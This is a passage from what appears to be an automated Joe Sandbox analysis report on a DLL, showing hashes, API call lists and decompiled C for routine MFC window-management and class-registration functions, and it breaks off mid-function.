                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Version$MessageRegisterWindow
                                                                                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                                                                                            • API String ID: 303823969-2485103130
                                                                                                                                                                            • Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                                                                                            • Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
                                                                                                                                                                            • Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                                                                                            • Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                            			E1000C209(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                            				long _t60;
                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				void* _t67;
                                                                                                                                                                            				void* _t71;
                                                                                                                                                                            				void* _t72;
                                                                                                                                                                            				long _t73;
                                                                                                                                                                            				void* _t74;
                                                                                                                                                                            				void* _t75;
                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                            				void* _t78;
                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            
                                                                                                                                                                            				_t71 = __edx;
                                                                                                                                                                            				_t79 = _t81 - 0x9c;
                                                                                                                                                                            				_t37 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                                                                                            				_t73 =  *(_t79 + 0xa4);
                                                                                                                                                                            				_t77 = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                                                                                            				E1000C12A(0);
                                                                                                                                                                            				_t67 = _t72;
                                                                                                                                                                            				_t63 = E1000C15E(0, _t79 - 0x70);
                                                                                                                                                                            				 *(_t79 - 0x7c) = _t63;
                                                                                                                                                                            				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                                                                                            					EnableWindow(_t63, 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                                                                                            				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                                                                                            				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_t77 = _t73 + 0x78;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t77 = _t60;
                                                                                                                                                                            						L8:
                                                                                                                                                                            						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                                                                                            						if(_t77 != 0) {
                                                                                                                                                                            							 *(_t79 - 0x74) =  *_t77;
                                                                                                                                                                            							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                                                                                            							if(_t57 != 0) {
                                                                                                                                                                            								 *_t77 = _t57 + 0x30000;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                                                                                            							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                                                                                            							if(_t54 <= 1) {
                                                                                                                                                                            								_t24 = _t79 + 0xac;
                                                                                                                                                                            								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                                                                                            								__eflags =  *_t24;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t54 + 0xfffffffd <= 1) {
                                                                                                                                                                            									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t96 = _t73;
                                                                                                                                                                            						 *(_t79 - 0x6c) = 0;
                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                            							_t64 = _t79 - 0x6c;
                                                                                                                                                                            							_t73 = 0x104;
                                                                                                                                                                            							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t64 =  *(_t73 + 0x50);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *(_t79 + 0xac));
                                                                                                                                                                            						_push(_t64);
                                                                                                                                                                            						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                                                                                            						_push( *(_t79 - 0x7c));
                                                                                                                                                                            						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
                                                                                                                                                                            						if(_t77 != 0) {
                                                                                                                                                                            							 *_t77 =  *(_t79 - 0x74);
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(_t79 - 0x70) != 0) {
                                                                                                                                                                            							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                                                                                            						}
                                                                                                                                                                            						E1000C12A(1);
                                                                                                                                                                            						_pop(_t75);
                                                                                                                                                                            						_pop(_t78);
                                                                                                                                                                            						_pop(_t65);
                                                                                                                                                                            						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}
























                                                                                                                                                                            0x1000c209
                                                                                                                                                                            0x1000c20a
                                                                                                                                                                            0x1000c217
                                                                                                                                                                            0x1000c21e
                                                                                                                                                                            0x1000c22d
                                                                                                                                                                            0x1000c233
                                                                                                                                                                            0x1000c236
                                                                                                                                                                            0x1000c239
                                                                                                                                                                            0x1000c23e
                                                                                                                                                                            0x1000c249
                                                                                                                                                                            0x1000c24e
                                                                                                                                                                            0x1000c251
                                                                                                                                                                            0x1000c256
                                                                                                                                                                            0x1000c256
                                                                                                                                                                            0x1000c25c
                                                                                                                                                                            0x1000c264
                                                                                                                                                                            0x1000c26c
                                                                                                                                                                            0x1000c291
                                                                                                                                                                            0x1000c291
                                                                                                                                                                            0x1000c293
                                                                                                                                                                            0x1000c295
                                                                                                                                                                            0x1000c295
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c279
                                                                                                                                                                            0x1000c283
                                                                                                                                                                            0x1000c28b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c28d
                                                                                                                                                                            0x1000c28d
                                                                                                                                                                            0x1000c298
                                                                                                                                                                            0x1000c298
                                                                                                                                                                            0x1000c29e
                                                                                                                                                                            0x1000c2a2
                                                                                                                                                                            0x1000c2a5
                                                                                                                                                                            0x1000c2ad
                                                                                                                                                                            0x1000c2b4
                                                                                                                                                                            0x1000c2b4
                                                                                                                                                                            0x1000c2ad
                                                                                                                                                                            0x1000c2bd
                                                                                                                                                                            0x1000c2c5
                                                                                                                                                                            0x1000c2cb
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2cd
                                                                                                                                                                            0x1000c2d3
                                                                                                                                                                            0x1000c2d5
                                                                                                                                                                            0x1000c2d5
                                                                                                                                                                            0x1000c2d3
                                                                                                                                                                            0x1000c2cb
                                                                                                                                                                            0x1000c2e5
                                                                                                                                                                            0x1000c2e7
                                                                                                                                                                            0x1000c2eb
                                                                                                                                                                            0x1000c2f2
                                                                                                                                                                            0x1000c2f5
                                                                                                                                                                            0x1000c306
                                                                                                                                                                            0x1000c308
                                                                                                                                                                            0x1000c30a
                                                                                                                                                                            0x1000c30a
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c311
                                                                                                                                                                            0x1000c317
                                                                                                                                                                            0x1000c318
                                                                                                                                                                            0x1000c31b
                                                                                                                                                                            0x1000c328
                                                                                                                                                                            0x1000c32a
                                                                                                                                                                            0x1000c32f
                                                                                                                                                                            0x1000c32f
                                                                                                                                                                            0x1000c335
                                                                                                                                                                            0x1000c33c
                                                                                                                                                                            0x1000c33c
                                                                                                                                                                            0x1000c344
                                                                                                                                                                            0x1000c352
                                                                                                                                                                            0x1000c353
                                                                                                                                                                            0x1000c356
                                                                                                                                                                            0x1000c363
                                                                                                                                                                            0x1000c363
                                                                                                                                                                            0x1000c28b

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                                                                                              • Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                                                                                              • Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                                                                                              • Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000C256
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 1000C26E
                                                                                                                                                                            • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 1000C283
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000C33C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1877664794-0
                                                                                                                                                                            • Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                                                                                            • Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
                                                                                                                                                                            • Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                                                                                            • Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                                                                                            				struct HWND__* _t7;
                                                                                                                                                                            				void* _t13;
                                                                                                                                                                            				struct HWND__** _t15;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t17;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                            				_t17 = _t18;
                                                                                                                                                                            				if(_t18 != 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t16 = _t17;
                                                                                                                                                                            						_t7 = _t17;
                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                            							L10:
                                                                                                                                                                            							if(_t18 == 0 && _t17 != 0) {
                                                                                                                                                                            								_t17 = GetLastActivePopup(_t17);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = _a8;
                                                                                                                                                                            							if(_t15 != 0) {
                                                                                                                                                                            								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                                                                                            									 *_t15 =  *_t15 & 0x00000000;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *_t15 = _t16;
                                                                                                                                                                            									EnableWindow(_t16, 0);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t17;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L9;
                                                                                                                                                                            						}
                                                                                                                                                                            						do {
                                                                                                                                                                            							L9:
                                                                                                                                                                            							_t16 = _t7;
                                                                                                                                                                            							_t7 = GetParent(_t7);
                                                                                                                                                                            						} while (_t7 != 0);
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t17 = GetParent(_t17);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t13 = E1000C087();
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t17 =  *(_t13 + 0x20);
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t13 = E1000A7CE();
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t17 = 0;
                                                                                                                                                                            				goto L8;
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000c166
                                                                                                                                                                            0x1000c16e
                                                                                                                                                                            0x1000c170
                                                                                                                                                                            0x1000c18d
                                                                                                                                                                            0x1000c19b
                                                                                                                                                                            0x1000c1a6
                                                                                                                                                                            0x1000c1a8
                                                                                                                                                                            0x1000c1aa
                                                                                                                                                                            0x1000c1ac
                                                                                                                                                                            0x1000c1b7
                                                                                                                                                                            0x1000c1b9
                                                                                                                                                                            0x1000c1c6
                                                                                                                                                                            0x1000c1c6
                                                                                                                                                                            0x1000c1c8
                                                                                                                                                                            0x1000c1ce
                                                                                                                                                                            0x1000c1d2
                                                                                                                                                                            0x1000c1f0
                                                                                                                                                                            0x1000c1e3
                                                                                                                                                                            0x1000c1e6
                                                                                                                                                                            0x1000c1e8
                                                                                                                                                                            0x1000c1e8
                                                                                                                                                                            0x1000c1d2
                                                                                                                                                                            0x1000c1f9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1af
                                                                                                                                                                            0x1000c1b1
                                                                                                                                                                            0x1000c1b3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1a0
                                                                                                                                                                            0x1000c1a2
                                                                                                                                                                            0x1000c1a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1a4
                                                                                                                                                                            0x1000c172
                                                                                                                                                                            0x1000c179
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x1000c17b
                                                                                                                                                                            0x1000c182
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c184
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongA.USER32 ref: 1000C190
                                                                                                                                                                            • GetParent.USER32(100014EC), ref: 1000C19E
                                                                                                                                                                            • GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                                                                                            • GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                                                                                            • IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                                                                                            • EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 670545878-0
                                                                                                                                                                            • Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                                                                                            • Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
                                                                                                                                                                            • Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                                                                                            • Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                            			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                                                                                            				struct tagRECT _v20;
                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                            
                                                                                                                                                                            				ClientToScreen(_a4,  &_a8);
                                                                                                                                                                            				_push(5);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t12 = GetWindow();
                                                                                                                                                                            					_t21 = _t12;
                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                            						GetWindowRect(_t21,  &_v20);
                                                                                                                                                                            						_push(_a12);
                                                                                                                                                                            						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                                                                                            							return _t21;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(2);
                                                                                                                                                                            					_push(_t21);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t12;
                                                                                                                                                                            			}






                                                                                                                                                                            0x10014129
                                                                                                                                                                            0x10014135
                                                                                                                                                                            0x10014137
                                                                                                                                                                            0x1001417a
                                                                                                                                                                            0x1001417a
                                                                                                                                                                            0x1001417c
                                                                                                                                                                            0x10014180
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014146
                                                                                                                                                                            0x1001415d
                                                                                                                                                                            0x10014163
                                                                                                                                                                            0x10014175
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014188
                                                                                                                                                                            0x10014175
                                                                                                                                                                            0x10014177
                                                                                                                                                                            0x10014179
                                                                                                                                                                            0x10014179
                                                                                                                                                                            0x10014185

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1315500227-0
                                                                                                                                                                            • Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                                                                                            • Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
                                                                                                                                                                            • Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                                                                                            • Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				char* _v20;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				signed int _t144;
                                                                                                                                                                            				signed int _t175;
                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                            				signed int _t179;
                                                                                                                                                                            				signed int _t181;
                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                            				signed int _t187;
                                                                                                                                                                            				void* _t190;
                                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                            
                                                                                                                                                                            				_t190 = __ecx;
                                                                                                                                                                            				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                            				_v8 = _t122;
                                                                                                                                                                            				_t3 =  &_a4;
                                                                                                                                                                            				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                                                                                            				if( *_t3 == 0) {
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                            				_t201 = 0;
                                                                                                                                                                            				E100174D0(0,  &_v56, 0, 0x28);
                                                                                                                                                                            				_v52 = DefWindowProcA;
                                                                                                                                                                            				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
                                                                                                                                                                            				__eflags = _a4 & 0x00000001;
                                                                                                                                                                            				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                            				_t130 =  *0x1005aa70; // 0x10003
                                                                                                                                                                            				_t187 = 8;
                                                                                                                                                                            				_v32 = _t130;
                                                                                                                                                                            				_v16 = _t187;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v56 = 0xb;
                                                                                                                                                                            					_v20 = "AfxWnd80s";
                                                                                                                                                                            					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
                                                                                                                                                                            					__eflags = _t183;
                                                                                                                                                                            					if(_t183 != 0) {
                                                                                                                                                                            						_t201 = 1;
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000020;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = _v56 | 0x0000008b;
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v20 = "AfxOleControl80s";
                                                                                                                                                                            					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                                                                                            					__eflags = _t181;
                                                                                                                                                                            					if(_t181 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000020;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000002;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                            					_v20 = "AfxControlBar80s";
                                                                                                                                                                            					_v28 = 0x10;
                                                                                                                                                                            					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                                                                                            					__eflags = _t179;
                                                                                                                                                                            					if(_t179 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000002;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000004;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = _t187;
                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                            					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                                                                                            					__eflags = _t177;
                                                                                                                                                                            					if(_t177 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000004;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & _t187;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = 0xb;
                                                                                                                                                                            					_v28 = 6;
                                                                                                                                                                            					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                                                                                            					__eflags = _t175;
                                                                                                                                                                            					if(_t175 != 0) {
                                                                                                                                                                            						_t201 = _t201 | _t187;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000010;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0xff;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                                                                                            					_t48 =  &_a4;
                                                                                                                                                                            					 *_t48 = _a4 & 0xffffc03f;
                                                                                                                                                                            					__eflags =  *_t48;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000040;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x10;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000080;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 2;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000100;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = _t187;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000200;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x20;
